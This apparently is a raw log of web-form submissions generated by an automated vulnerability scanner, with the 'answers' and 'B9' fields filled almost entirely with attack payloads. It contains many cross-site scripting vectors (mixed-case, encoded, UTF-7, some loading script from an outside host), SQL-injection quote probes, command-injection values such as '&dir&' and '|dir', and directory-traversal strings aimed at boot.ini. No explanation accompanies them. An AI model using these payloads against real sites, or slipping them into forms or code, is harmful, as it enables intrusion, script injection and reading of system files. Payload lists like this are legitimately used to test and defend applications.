answers: V5
B9: Submit
answers: V5
B9: Submit
answers: V2
B9: Submit
answers: almost positive
B9: Submit
answers: V2
B9: Submit
answers: almost positive
B9: Submit
answers: V3
B9: Submit
answers: almost positive
B9: Submit
answers: V2
B9: Submit
answers: V5
B9: Submit
answers: V5
B9: Submit
answers: V2
B9: Submit
answers: almost positive
B9: Submit
answers: almost positive
B9: Submit
answers: V2
B9: Submit
answers: almost positive
B9: Submit
answers: almost positive
B9: Submit
answers: almost positive
B9: Submit
answers: V5
B9: Submit
answers: V5
B9: Submit
answers: almost positive
B9: Submit
answers: almost positive
B9: Submit
answers: <ScRiPt
>alert(40020.3916412616);</ScRiPt>
B9: Submit
answers: >"><ScRiPt
>alert(40022.3916412616);</ScRiPt>
B9: Submit
answers: acue5f48ea504b5c66799c5e54424204bf4
B9: Submit
answers: email@some<ScRiPt
>alert(40026.3916412616);</ScRiPt>domain.com
B9: Submit
answers: --><ScRiPt
>alert(40025.3916412616);</ScRiPt>
B9: Submit
answers: <script>alert(40019.3916412616)</script>
B9: Submit
answers: </textarea><ScRiPt
>alert(40023.3916412616);</ScRiPt>
B9: Submit
answers: >'><ScRiPt
>alert(40021.3916412616);</ScRiPt>
B9: Submit
answers: [img]JaVaScRiPt:alert(40027.3916412616)[/img]
B9: Submit
answers: almost positive
B9: acu9a4398b98445ed39ab7aafa8877491bf
answers: V4
B9: acu5452a9936e48b282473ff7bcf775d744
answers: V5
B9: acu6d2c9e97b57812e1d39662487c35f4d7
answers: V2
B9: acu0dd96305b8cd4f4808f068abcb591409
answers: </title><ScRiPt
>alert(40024.3916412616);</ScRiPt>
B9: Submit
answers: V3
B9: acuaa7745a6806674fc9fbedf9849a7aff8
answers: V3
B9: <script>alert(40035.3916417245)</script>
answers: V2
B9: <script>alert(40034.3916417245)</script>
answers: V4
B9: <script>alert(40036.3916417245)</script>
answers: almost positive
B9: <script>alert(40033.3916417245)</script>
answers: V5
B9: <script>alert(40037.3916417245)</script>
answers: <FRAMESET><FRAME SRC="JaVaScRiPt:alert(40052.3920447569);"></FRAMESET>
B9: Submit
answers: <script>alert(40049.3920447569);</script>
B9: Submit
answers: <img src="JaVaScRiPt:alert(40048.3920447569);">
B9: Submit
answers: <DIV STYLE="width:expression(alert(40051.3920447569));">
B9: Submit
answers: <img dynsrc="JaVaScRiPt:alert(40053.3920447569);">
B9: Submit
answers: <META HTTP-EQUIV="refresh" CONTENT="0;url=JaVaScRiPt:alert(40054.3920447569);">
B9: Submit
answers: <scrip<script>t>alert(40050.3920447569);</scrip</script>t>
B9: Submit
answers: <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=" invalid="40055.3920447569">
B9: Submit
answers: almost positive
B9: <ScRiPt
>alert(40058.3920484722);</ScRiPt>
answers: <body onload=alert(40057.3920447569)>
B9: Submit
answers: <embed src="http://testphp.acunetix.com/xss.swf?40056.3920447569" type="application/x-shockwave-flash"/>
B9: Submit
answers: V2
B9: <ScRiPt
>alert(40059.3920484722);</ScRiPt>
answers: V3
B9: <ScRiPt
>alert(40060.3920484722);</ScRiPt>
answers: V4
B9: <ScRiPt
>alert(40061.392048588);</ScRiPt>
answers: V5
B9: <ScRiPt
>alert(40062.392048588);</ScRiPt>
answers: V3
B9: >'><ScRiPt
>alert(40065.392048588);</ScRiPt>
answers: almost positive
B9: >'><ScRiPt
>alert(40063.392048588);</ScRiPt>
answers: V4
B9: >'><ScRiPt
>alert(40066.392048588);</ScRiPt>
answers: V2
B9: >'><ScRiPt
>alert(40064.392048588);</ScRiPt>
answers: V5
B9: >'><ScRiPt
>alert(40067.392048588);</ScRiPt>
answers: <img src=http://testphp.acunetix.com/dot.gif onload=alert(40080.392521412)>
B9: Submit
answers: <script/xss src=http://testphp.acunetix.com/xss.js?40079.392521412></script>
B9: Submit
answers: <ScRiPt src=http://testphp.acunetix.com/xss.js?40078.392521412></ScRiPt>
B9: Submit
answers: <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;charset=UTF-7"></HEAD>+ADw-ScRiPt+AD4-alert(40086.392521412)+ADsAPA-/ScRiPt+AD4-
B9: Submit
answers: ' style='background:url(JaVaScRiPt:alert(40081.392521412))' invalidparam='
B9: Submit
answers: " onmouseover=alert(40084.392521412)
B9: Submit
answers: </div><ScRiPt
>alert(40085.392521412);</ScRiPt>
B9: Submit
answers: <ScRiPt bad=">" src="http://testphp.acunetix.com/xss.js?40083.392521412"></ScRiPt>
B9: Submit
answers: V5
B9: >"><ScRiPt
>alert(40092.3925276736);</ScRiPt>
answers: '"><ScRiPt
>alert(40087.392521412);</ScRiPt>
B9: Submit
answers: %3CScRiPt%3Ealert(40082.392521412);%3C/ScRiPt%3E
B9: Submit
answers: V3
B9: >"><ScRiPt
>alert(40090.3925276736);</ScRiPt>
answers: V4
B9: >"><ScRiPt
>alert(40091.3925276736);</ScRiPt>
answers: V2
B9: >"><ScRiPt
>alert(40089.3925276736);</ScRiPt>
answers: almost positive
B9: >"><ScRiPt
>alert(40088.3925275579);</ScRiPt>
answers: V3
B9: </textarea><ScRiPt
>alert(40095.3925276736);</ScRiPt>
answers: almost positive
B9: </textarea><ScRiPt
>alert(40093.3925276736);</ScRiPt>
answers: V4
B9: </textarea><ScRiPt
>alert(40096.3925276736);</ScRiPt>
answers: V5
B9: </textarea><ScRiPt
>alert(40097.3925276736);</ScRiPt>
answers: V2
B9: </textarea><ScRiPt
>alert(40094.3925276736);</ScRiPt>
answers: "'><ScRiPt
>alert(40108.3932585301);</ScRiPt>
B9: Submit
answers: PiI PFNjUmlQdD5hbGVydCgneHNzLXRlc3QnKTs8L1NjUmlQdD4=
B9: Submit
answers: PFNjUmlQdD5hbGVydCgneHNzLXRlc3QnKTs8L1NjUmlQdD4=
B9: Submit
answers: javascript:alert(40117.3932585301)
B9: Submit
answers: Pic PFNjUmlQdD5hbGVydCgneHNzLXRlc3QnKTs8L1NjUmlQdD4=
B9: Submit
answers: %uff1e%uff07%uff1exxx%uff1cscript%uff1ealert(40115.3932585301);%uff1c/script%uff1e
B9: Submit
answers: %uff1e%uff02%uff1exxx%uff1cscript%uff1ealert(40114.3932585301);%uff1c/script%uff1e
B9: Submit
answers: ACUstart40113.3932585301'";ACUend
B9: Submit
answers: IiBvbm1vdXNlb3Zlcj0iYWxlcnQoJ3hzcy10ZXN0Jyk=
B9: Submit
answers: </xss/*-*/style=xss:e/**/xpression(alert(40116.3932585301))>
B9: Submit
answers: V4
B9: </title><ScRiPt
>alert(40121.3932652546);</ScRiPt>
answers: V4
B9: --><ScRiPt
>alert(40126.3932653704);</ScRiPt>
answers: V5
B9: </title><ScRiPt
>alert(40122.3932652546);</ScRiPt>
answers: V2
B9: </title><ScRiPt
>alert(40119.3932652546);</ScRiPt>
answers: V3
B9: --><ScRiPt
>alert(40125.3932653704);</ScRiPt>
answers: V5
B9: --><ScRiPt
>alert(40127.3932653704);</ScRiPt>
answers: V3
B9: </title><ScRiPt
>alert(40120.3932652546);</ScRiPt>
answers: almost positive
B9: </title><ScRiPt
>alert(40118.3932652546);</ScRiPt>
answers: almost positive
B9: --><ScRiPt
>alert(40123.3932653704);</ScRiPt>
answers: V2
B9: --><ScRiPt
>alert(40124.3932653704);</ScRiPt>
answers: ;acunetix:expr/**/ession(alert(40138.3939812616));
B9: Submit
answers: <iframe/ /onload=alert(40139.3939812616)></iframe>
B9: Submit
answers: V4
B9: email@some<ScRiPt
>alert(40143.3939908912);</ScRiPt>domain.com
answers: almost positive
B9: email@some<ScRiPt
>alert(40140.3939907755);</ScRiPt>domain.com
answers: V3
B9: email@some<ScRiPt
>alert(40142.3939907755);</ScRiPt>domain.com
answers: V2
B9: email@some<ScRiPt
>alert(40141.3939907755);</ScRiPt>domain.com
answers: V4
B9: [img]JaVaScRiPt:alert(40148.3939908912)[/img]
answers: V5
B9: email@some<ScRiPt
>alert(40144.3939908912);</ScRiPt>domain.com
answers: V3
B9: [img]JaVaScRiPt:alert(40147.3939908912)[/img]
answers: almost positive
B9: [img]JaVaScRiPt:alert(40145.3939908912)[/img]
answers: V2
B9: [img]JaVaScRiPt:alert(40146.3939908912)[/img]
answers: V5
B9: [img]JaVaScRiPt:alert(40149.3939908912)[/img]
answers: almost positive
B9: <img src="JaVaScRiPt:alert(40160.3946048958);">
answers: V3
B9: <img src="JaVaScRiPt:alert(40162.3946048958);">
answers: V4
B9: <img src="JaVaScRiPt:alert(40163.3946048958);">
answers: V2
B9: <img src="JaVaScRiPt:alert(40161.3946048958);">
answers: V5
B9: <img src="JaVaScRiPt:alert(40164.3946050116);">
answers: V5
B9: <script>alert(40169.3946050116);</script>
answers: V3
B9: <script>alert(40167.3946050116);</script>
answers: almost positive
B9: <script>alert(40165.3946050116);</script>
answers: V4
B9: <script>alert(40168.3946050116);</script>
answers: V2
B9: <script>alert(40166.3946050116);</script>
answers: V3
B9: <scrip<script>t>alert(40182.3952379167);</scrip</script>t>
answers: V5
B9: <scrip<script>t>alert(40184.3952379167);</scrip</script>t>
answers: V2
B9: <scrip<script>t>alert(40181.3952379167);</scrip</script>t>
answers: almost positive
B9: <DIV STYLE="width:expression(alert(40185.3952379167));">
answers: V4
B9: <scrip<script>t>alert(40183.3952379167);</scrip</script>t>
answers: almost positive
B9: <scrip<script>t>alert(40180.3952379167);</scrip</script>t>
answers: V4
B9: <DIV STYLE="width:expression(alert(40188.3952379167));">
answers: V3
B9: <DIV STYLE="width:expression(alert(40187.3952379167));">
answers: V2
B9: <DIV STYLE="width:expression(alert(40186.3952379167));">
answers: V5
B9: <DIV STYLE="width:expression(alert(40189.3952379167));">
answers: V3
B9: <img dynsrc="JaVaScRiPt:alert(40207.395802662);">
answers: almost positive
B9: <FRAMESET><FRAME SRC="JaVaScRiPt:alert(40200.3958025463);"></FRAMESET>
answers: V2
B9: <FRAMESET><FRAME SRC="JaVaScRiPt:alert(40201.3958025463);"></FRAMESET>
answers: V3
B9: <FRAMESET><FRAME SRC="JaVaScRiPt:alert(40202.3958025463);"></FRAMESET>
answers: V4
B9: <img dynsrc="JaVaScRiPt:alert(40208.395802662);">
answers: V5
B9: <FRAMESET><FRAME SRC="JaVaScRiPt:alert(40204.395802662);"></FRAMESET>
answers: V2
B9: <img dynsrc="JaVaScRiPt:alert(40206.395802662);">
answers: V4
B9: <FRAMESET><FRAME SRC="JaVaScRiPt:alert(40203.3958025463);"></FRAMESET>
answers: almost positive
B9: <img dynsrc="JaVaScRiPt:alert(40205.395802662);">
answers: V5
B9: <img dynsrc="JaVaScRiPt:alert(40209.395802662);">
answers: V2
B9: <META HTTP-EQUIV="refresh" CONTENT="0;url=JaVaScRiPt:alert(40221.3961389352);">
answers: almost positive
B9: <META HTTP-EQUIV="refresh" CONTENT="0;url=JaVaScRiPt:alert(40220.3961389352);">
answers: V3
B9: <META HTTP-EQUIV="refresh" CONTENT="0;url=JaVaScRiPt:alert(40222.3961389352);">
answers: V3
B9: <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=" invalid="40227.3961390509">
answers: V5
B9: <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=" invalid="40229.3961390509">
answers: V2
B9: <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=" invalid="40226.3961389352">
answers: V5
B9: <META HTTP-EQUIV="refresh" CONTENT="0;url=JaVaScRiPt:alert(40224.3961389352);">
answers: V4
B9: <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=" invalid="40228.3961390509">
answers: almost positive
B9: <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=" invalid="40225.3961389352">
answers: V4
B9: <META HTTP-EQUIV="refresh" CONTENT="0;url=JaVaScRiPt:alert(40223.3961389352);">
answers: V4
B9: <body onload=alert(40248.3964227083)>
answers: V3
B9: <embed src="http://testphp.acunetix.com/xss.swf?40242.3964225926" type="application/x-shockwave-flash"/>
answers: V5
B9: <body onload=alert(40249.3964227083)>
answers: V4
B9: <embed src="http://testphp.acunetix.com/xss.swf?40243.3964227083" type="application/x-shockwave-flash"/>
answers: almost positive
B9: <embed src="http://testphp.acunetix.com/xss.swf?40240.3964225926" type="application/x-shockwave-flash"/>
answers: V5
B9: <embed src="http://testphp.acunetix.com/xss.swf?40244.3964227083" type="application/x-shockwave-flash"/>
answers: V3
B9: <body onload=alert(40247.3964227083)>
answers: almost positive
B9: <body onload=alert(40245.3964227083)>
answers: V2
B9: <embed src="http://testphp.acunetix.com/xss.swf?40241.3964225926" type="application/x-shockwave-flash"/>
answers: V2
B9: <body onload=alert(40246.3964227083)>
answers: V2
B9: <ScRiPt src=http://testphp.acunetix.com/xss.js?40261.3967348727></ScRiPt>
answers: almost positive
B9: <ScRiPt src=http://testphp.acunetix.com/xss.js?40260.3967348727></ScRiPt>
answers: V4
B9: <ScRiPt src=http://testphp.acunetix.com/xss.js?40263.3967348727></ScRiPt>
answers: V2
B9: <script/xss src=http://testphp.acunetix.com/xss.js?40266.3967349884></script>
answers: V5
B9: <ScRiPt src=http://testphp.acunetix.com/xss.js?40264.3967348727></ScRiPt>
answers: V5
B9: <script/xss src=http://testphp.acunetix.com/xss.js?40269.3967349884></script>
answers: V3
B9: <script/xss src=http://testphp.acunetix.com/xss.js?40267.3967349884></script>
answers: almost positive
B9: <script/xss src=http://testphp.acunetix.com/xss.js?40265.3967349884></script>
answers: V3
B9: <ScRiPt src=http://testphp.acunetix.com/xss.js?40262.3967348727></ScRiPt>
answers: V4
B9: <script/xss src=http://testphp.acunetix.com/xss.js?40268.3967349884></script>
answers: V5
B9: <img src=http://testphp.acunetix.com/dot.gif onload=alert(40284.3970939815)>
answers: almost positive
B9: <img src=http://testphp.acunetix.com/dot.gif onload=alert(40280.3970938657)>
answers: V3
B9: ' style='background:url(JaVaScRiPt:alert(40287.3970939815))' invalidparam='
answers: V2
B9: ' style='background:url(JaVaScRiPt:alert(40286.3970939815))' invalidparam='
answers: V4
B9: <img src=http://testphp.acunetix.com/dot.gif onload=alert(40283.3970939815)>
answers: V3
B9: <img src=http://testphp.acunetix.com/dot.gif onload=alert(40282.3970939815)>
answers: almost positive
B9: ' style='background:url(JaVaScRiPt:alert(40285.3970939815))' invalidparam='
answers: V4
B9: ' style='background:url(JaVaScRiPt:alert(40288.3970939815))' invalidparam='
answers: V2
B9: <img src=http://testphp.acunetix.com/dot.gif onload=alert(40281.3970938657)>
answers: V5
B9: ' style='background:url(JaVaScRiPt:alert(40289.3970939815))' invalidparam='
answers: V3
B9: %3CScRiPt%3Ealert(40302.3973858565);%3C/ScRiPt%3E
answers: almost positive
B9: %3CScRiPt%3Ealert(40300.3973857407);%3C/ScRiPt%3E
answers: V2
B9: <ScRiPt bad=">" src="http://testphp.acunetix.com/xss.js?40306.3973858565"></ScRiPt>
answers: V2
B9: %3CScRiPt%3Ealert(40301.3973858565);%3C/ScRiPt%3E
answers: almost positive
B9: <ScRiPt bad=">" src="http://testphp.acunetix.com/xss.js?40305.3973858565"></ScRiPt>
answers: V4
B9: <ScRiPt bad=">" src="http://testphp.acunetix.com/xss.js?40308.3973858565"></ScRiPt>
answers: V5
B9: %3CScRiPt%3Ealert(40304.3973858565);%3C/ScRiPt%3E
answers: V3
B9: <ScRiPt bad=">" src="http://testphp.acunetix.com/xss.js?40307.3973858565"></ScRiPt>
answers: V4
B9: %3CScRiPt%3Ealert(40303.3973858565);%3C/ScRiPt%3E
answers: V5
B9: <ScRiPt bad=">" src="http://testphp.acunetix.com/xss.js?40309.3973858565"></ScRiPt>
answers: almost positive
B9: " onmouseover=alert(40320.3976283565)
answers: V2
B9: " onmouseover=alert(40321.3976283565)
answers: V4
B9: " onmouseover=alert(40323.3976283565)
answers: V3
B9: " onmouseover=alert(40322.3976283565)
answers: V4
B9: </div><ScRiPt
>alert(40328.3976283565);</ScRiPt>
answers: V5
B9: " onmouseover=alert(40324.3976283565)
answers: almost positive
B9: </div><ScRiPt
>alert(40325.3976283565);</ScRiPt>
answers: V2
B9: </div><ScRiPt
>alert(40326.3976283565);</ScRiPt>
answers: V3
B9: </div><ScRiPt
>alert(40327.3976283565);</ScRiPt>
answers: V5
B9: </div><ScRiPt
>alert(40329.3976283565);</ScRiPt>
answers: V3
B9: <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;charset=UTF-7"></HEAD>+ADw-ScRiPt+AD4-alert(40342.3978540394)+ADsAPA-/ScRiPt+AD4-
answers: V4
B9: <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;charset=UTF-7"></HEAD>+ADw-ScRiPt+AD4-alert(40343.3978540394)+ADsAPA-/ScRiPt+AD4-
answers: almost positive
B9: <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;charset=UTF-7"></HEAD>+ADw-ScRiPt+AD4-alert(40340.3978540394)+ADsAPA-/ScRiPt+AD4-
answers: V2
B9: '"><ScRiPt
>alert(40346.3978540394);</ScRiPt>
answers: V5
B9: <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;charset=UTF-7"></HEAD>+ADw-ScRiPt+AD4-alert(40344.3978540394)+ADsAPA-/ScRiPt+AD4-
answers: V5
B9: '"><ScRiPt
>alert(40349.3978540394);</ScRiPt>
answers: V2
B9: <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;charset=UTF-7"></HEAD>+ADw-ScRiPt+AD4-alert(40341.3978540394)+ADsAPA-/ScRiPt+AD4-
answers: almost positive
B9: '"><ScRiPt
>alert(40345.3978540394);</ScRiPt>
answers: V3
B9: '"><ScRiPt
>alert(40347.3978540394);</ScRiPt>
answers: V4
B9: '"><ScRiPt
>alert(40348.3978540394);</ScRiPt>
answers: V2
B9: "'><ScRiPt
>alert(40361.3980645486);</ScRiPt>
answers: V3
B9: "'><ScRiPt
>alert(40362.3980646644);</ScRiPt>
answers: almost positive
B9: "'><ScRiPt
>alert(40360.3980645486);</ScRiPt>
answers: V4
B9: "'><ScRiPt
>alert(40363.3980646644);</ScRiPt>
answers: V5
B9: "'><ScRiPt
>alert(40364.3980646644);</ScRiPt>
answers: V2
B9: PFNjUmlQdD5hbGVydCgneHNzLXRlc3QnKTs8L1NjUmlQdD4=
answers: almost positive
B9: PFNjUmlQdD5hbGVydCgneHNzLXRlc3QnKTs8L1NjUmlQdD4=
answers: V3
B9: PFNjUmlQdD5hbGVydCgneHNzLXRlc3QnKTs8L1NjUmlQdD4=
answers: V5
B9: PFNjUmlQdD5hbGVydCgneHNzLXRlc3QnKTs8L1NjUmlQdD4=
answers: V4
B9: PFNjUmlQdD5hbGVydCgneHNzLXRlc3QnKTs8L1NjUmlQdD4=
answers: almost positive
B9: Pic PFNjUmlQdD5hbGVydCgneHNzLXRlc3QnKTs8L1NjUmlQdD4=
answers: V3
B9: Pic PFNjUmlQdD5hbGVydCgneHNzLXRlc3QnKTs8L1NjUmlQdD4=
answers: V4
B9: Pic PFNjUmlQdD5hbGVydCgneHNzLXRlc3QnKTs8L1NjUmlQdD4=
answers: almost positive
B9: PiI PFNjUmlQdD5hbGVydCgneHNzLXRlc3QnKTs8L1NjUmlQdD4=
answers: V2
B9: Pic PFNjUmlQdD5hbGVydCgneHNzLXRlc3QnKTs8L1NjUmlQdD4=
answers: V5
B9: Pic PFNjUmlQdD5hbGVydCgneHNzLXRlc3QnKTs8L1NjUmlQdD4=
answers: V5
B9: PiI PFNjUmlQdD5hbGVydCgneHNzLXRlc3QnKTs8L1NjUmlQdD4=
answers: V3
B9: PiI PFNjUmlQdD5hbGVydCgneHNzLXRlc3QnKTs8L1NjUmlQdD4=
answers: V4
B9: PiI PFNjUmlQdD5hbGVydCgneHNzLXRlc3QnKTs8L1NjUmlQdD4=
answers: V2
B9: PiI PFNjUmlQdD5hbGVydCgneHNzLXRlc3QnKTs8L1NjUmlQdD4=
answers: V2
B9: IiBvbm1vdXNlb3Zlcj0iYWxlcnQoJ3hzcy10ZXN0Jyk=
answers: almost positive
B9: IiBvbm1vdXNlb3Zlcj0iYWxlcnQoJ3hzcy10ZXN0Jyk=
answers: V5
B9: IiBvbm1vdXNlb3Zlcj0iYWxlcnQoJ3hzcy10ZXN0Jyk=
answers: V2
B9: ACUstart40406.3985234607'";ACUend
answers: V4
B9: IiBvbm1vdXNlb3Zlcj0iYWxlcnQoJ3hzcy10ZXN0Jyk=
answers: V3
B9: ACUstart40407.3985234607'";ACUend
answers: V3
B9: IiBvbm1vdXNlb3Zlcj0iYWxlcnQoJ3hzcy10ZXN0Jyk=
answers: almost positive
B9: ACUstart40405.3985234607'";ACUend
answers: V5
B9: ACUstart40409.3985235764'";ACUend
answers: V4
B9: ACUstart40408.3985234607'";ACUend
answers: almost positive
B9: %uff1e%uff02%uff1exxx%uff1cscript%uff1ealert(40420.3987281713);%uff1c/script%uff1e
answers: V3
B9: %uff1e%uff02%uff1exxx%uff1cscript%uff1ealert(40422.3987281713);%uff1c/script%uff1e
answers: V2
B9: %uff1e%uff02%uff1exxx%uff1cscript%uff1ealert(40421.3987281713);%uff1c/script%uff1e
answers: V5
B9: %uff1e%uff02%uff1exxx%uff1cscript%uff1ealert(40424.3987281713);%uff1c/script%uff1e
answers: almost positive
B9: %uff1e%uff07%uff1exxx%uff1cscript%uff1ealert(40425.3987281713);%uff1c/script%uff1e
answers: V4
B9: %uff1e%uff02%uff1exxx%uff1cscript%uff1ealert(40423.3987281713);%uff1c/script%uff1e
answers: V4
B9: %uff1e%uff07%uff1exxx%uff1cscript%uff1ealert(40428.3987281713);%uff1c/script%uff1e
answers: V2
B9: %uff1e%uff07%uff1exxx%uff1cscript%uff1ealert(40426.3987281713);%uff1c/script%uff1e
answers: V5
B9: %uff1e%uff07%uff1exxx%uff1cscript%uff1ealert(40429.3987281713);%uff1c/script%uff1e
answers: V3
B9: %uff1e%uff07%uff1exxx%uff1cscript%uff1ealert(40427.3987281713);%uff1c/script%uff1e
answers: almost positive
B9: </xss/*-*/style=xss:e/**/xpression(alert(40440.3995508333))>
answers: V2
B9: </xss/*-*/style=xss:e/**/xpression(alert(40441.3995508333))>
answers: V3
B9: </xss/*-*/style=xss:e/**/xpression(alert(40442.3995508333))>
answers: V4
B9: </xss/*-*/style=xss:e/**/xpression(alert(40443.3995508333))>
answers: almost positive
B9: javascript:alert(40445.3995508333)
answers: V5
B9: javascript:alert(40449.3995508333)
answers: V3
B9: javascript:alert(40447.3995508333)
answers: V4
B9: javascript:alert(40448.3995508333)
answers: V5
B9: </xss/*-*/style=xss:e/**/xpression(alert(40444.3995508333))>
answers: V2
B9: javascript:alert(40446.3995508333)
answers: V5
B9: <iframe/ /onload=alert(40469.3997537963)></iframe>
answers: V3
B9: ;acunetix:expr/**/ession(alert(40462.3997537963));
answers: V3
B9: <iframe/ /onload=alert(40467.3997537963)></iframe>
answers: almost positive
B9: <iframe/ /onload=alert(40465.3997537963)></iframe>
answers: V2
B9: <iframe/ /onload=alert(40466.3997537963)></iframe>
answers: V5
B9: ;acunetix:expr/**/ession(alert(40464.3997537963));
answers: V4
B9: <iframe/ /onload=alert(40468.3997537963)></iframe>
answers: V2
B9: ;acunetix:expr/**/ession(alert(40461.3997537963));
answers: almost positive
B9: ;acunetix:expr/**/ession(alert(40460.3997537963));
answers: V4
B9: ;acunetix:expr/**/ession(alert(40463.3997537963));
answers: %27
B9: Submit
answers: '
B9: Submit
answers: acunetix'"
B9: Submit
answers: \"
B9: Submit
answers: \'
B9: Submit
answers: JyI=
B9: Submit
answers: almost positive
B9: '
answers: '
B9: Submit
answers: V5
B9: '
answers: V3
B9: '
answers: V4
B9: '
answers: almost positive
B9: %27
answers: V2
B9: '
answers: V3
B9: %27
answers: 0.01
B9: Submit
answers: V2
B9: %27
answers: V5
B9: %27
answers: V4
B9: %27
answers: V2
B9: '
answers: V3
B9: '
answers: V4
B9: acunetix'"
answers: almost positive
B9: '
answers: V4
B9: '
answers: almost positive
B9: acunetix'"
answers: V5
B9: acunetix'"
answers: V3
B9: acunetix'"
answers: V5
B9: '
answers: V2
B9: acunetix'"
answers: almost positive
B9: \'
answers: V5
B9: \'
answers: V4
B9: \"
answers: V2
B9: \'
answers: V3
B9: \"
answers: V5
B9: \"
answers: almost positive
B9: \"
answers: V3
B9: \'
answers: V2
B9: \"
answers: V4
B9: \'
answers: almost positive
B9: JyI=
answers: V2
B9: JyI=
answers: V4
B9: JyI=
answers: V3
B9: JyI=
answers: V2
B9: 0.01
answers: V5
B9: JyI=
answers: V3
B9: 0.01
answers: V4
B9: 0.01
answers: almost positive
B9: 0.01
answers: V5
B9: 0.01
answers: &dir&
B9: Submit
answers: |dir
B9: Submit
answers: dir
B9: Submit
answers: &dir
B9: Submit
answers: ;dir
B9: Submit
answers: <dir
B9: Submit
answers: almost positive
B9: &dir&
answers: dir
B9: Submit
answers: V3
B9: &dir&
answers: V5
B9: &dir&
answers: V2
B9: &dir&
answers: V4
B9: &dir&
answers: almost positive
B9: |dir
answers: V2
B9: |dir
answers: V4
B9: |dir
answers: V5
B9: |dir
answers: V3
B9: |dir
answers: V3
B9: ;dir
answers: V4
B9: ;dir
answers: almost positive
B9: &dir
answers: V5
B9: ;dir
answers: almost positive
B9: ;dir
answers: V3
B9: &dir
answers: V2
B9: ;dir
answers: V2
B9: &dir
answers: V4
B9: &dir
answers: V5
B9: &dir
answers: V2
B9: dir
answers: V3
B9: dir
answers: almost positive
B9: dir
answers: V4
B9: dir
answers: V4
B9: dir
answers: V3
B9: dir
answers: V2
B9: dir
answers: almost positive
B9: dir
answers: V5
B9: dir
answers: V5
B9: dir
answers: V2
B9: <dir
answers: V3
B9: <dir
answers: almost positive
B9: <dir
answers: V4
B9: <dir
answers: V5
B9: <dir
answers: ../../../../../../../../boot.ini
B9: Submit
answers: ../../../../../../../../boot.ini
B9: Submit
answers: À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯boot.ini
B9: Submit
answers: ../../../../../../../../boot.ini.html
B9: Submit
answers: C:\boot.ini
B9: Submit
answers: ..\..\..\..\..\..\..\..\boot.ini
B9: Submit
answers: ../..//../..//../..//../..//../..//../..//../..//../..//boot.ini
B9: Submit
answers: /.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
B9: Submit
answers: almost positive
B9: ../../../../../../../../boot.ini
answers: /./././././././boot.ini
B9: Submit
answers: ../../../../../../../../boot.ini.jpg
B9: Submit
answers: V3
B9: ../../../../../../../../boot.ini
answers: V2
B9: ../../../../../../../../boot.ini
answers: almost positive
B9: ../../../../../../../../boot.ini
answers: V5
B9: ../../../../../../../../boot.ini
answers: V4
B9: ../../../../../../../../boot.ini
answers: V3
B9: ../../../../../../../../boot.ini
answers: V4
B9: ../../../../../../../../boot.ini
answers: V5
B9: ../../../../../../../../boot.ini
answers: V2
B9: ../../../../../../../../boot.ini
answers: |..\..\..\..\..\..\..\..\boot.ini
B9: Submit
answers: <..\..\..\..\..\..\..\..\boot.ini
B9: Submit
answers: ..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯boot.ini
B9: Submit
answers: V5
B9: À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯boot.ini
answers: almost positive
B9: À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯boot.ini
answers: ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././boot.ini
B9: Submit
answers: almost positive
B9: ../../../../../../../../boot.ini.html
answers: V3
B9: À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯boot.ini
answers: V4
B9: À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯boot.ini
answers: V2
B9: À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯boot.ini
answers: V2
B9: ../../../../../../../../boot.ini.html
answers: V5
B9: ../../../../../../../../boot.ini.html
answers: V3
B9: ../../../../../../../../boot.ini.html
answers: V4
B9: ../../../../../../../../boot.ini.html
answers: almost positive
B9: ../../../../../../../../boot.ini.jpg
answers: V3
B9: ../../../../../../../../boot.ini.jpg
answers: V4
B9: ../../../../../../../../boot.ini.jpg
answers: V2
B9: ../../../../../../../../boot.ini.jpg
answers: V2
B9: /.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
answers: V5
B9: ../../../../../../../../boot.ini.jpg
answers: V5
B9: /.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
answers: V3
B9: /.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
answers: V4
B9: /.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
answers: almost positive
B9: /.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
answers: V3
B9: C:\boot.ini
answers: V4
B9: C:\boot.ini
answers: V2
B9: C:\boot.ini
answers: V5
B9: C:\boot.ini
answers: almost positive
B9: C:\boot.ini
answers: almost positive
B9: /./././././././boot.ini
answers: V4
B9: /./././././././boot.ini
answers: V5
B9: /./././././././boot.ini
answers: V3
B9: /./././././././boot.ini
answers: V2
B9: /./././././././boot.ini
answers: V2
B9: ..\..\..\..\..\..\..\..\boot.ini
